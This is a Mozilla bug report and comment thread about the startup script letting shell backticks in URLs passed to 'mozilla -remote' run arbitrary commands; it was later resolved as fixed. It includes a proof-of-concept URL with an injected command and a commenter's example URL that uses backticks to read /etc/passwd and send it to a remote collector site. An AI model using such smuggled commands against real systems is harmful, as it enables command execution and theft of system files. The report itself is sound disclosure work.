246524 - mozilla should protect special characters from interpretation by the shell

Status: RESOLVED WORKSFORME

(Core Graveyard :: Cmd-line Features, defect)

Description

[Vincent Lefevre]

User-Agent:       Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7) Gecko/20040609
Build Identifier: Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.7) Gecko/20040609

The mozilla script doesn't protect special characters from being interpreted by
the shell, allowing to run arbitrary code (in particular when mozilla is
launched by another program).

Reproducible: Always
Steps to Reproduce:
1. In a shell, type
  mozilla -remote 'openurl(http://localhost/`echo>z`,new-tab)'
Actual Results:  
The http://localhost/ URL is opened and a file "z" is created.

Expected Results:  
The file "z" shouldn't have been created.

Comment 1

[Vincent Lefevre]

This bug is still present.

BTW, Debian has a different startup script, with no eval command, so that this
bug doesn't occur.

Comment 2

[Daniel Veditz [:dveditz] (OOO: back Aug 26)]

Not a remote exploit, clearing confidential flag to hopefully gain some visibility.

Comment 3

[Vincent Lefevre]

I disagree. It can be a remote exploit with user interaction. A click in your
RSS feed reader to open a URL can be sufficient. Of course, I always check the
URL before doing that, but I don't think every user does that.

Comment 4

[Erwan David]

It can even lead to information leak toward the site, imagine what the following
URL will do
http://www.mysite.tld/cgi-bin/collect.cgi?pass=`cat /etc/passwd`

Comment 5

[blujay]

Any chance of this getting fixed?  Doesn't seem like it should be too hard; just
use Debian's script as a reference.

Comment 6

[Benjamin Smedberg]

Pretty sure this got fixed at some point: it certainly WFM with mozilla-central.

Comment 7

[Vincent Lefevre]

Yes, the script from FF 3.5b4 looks OK.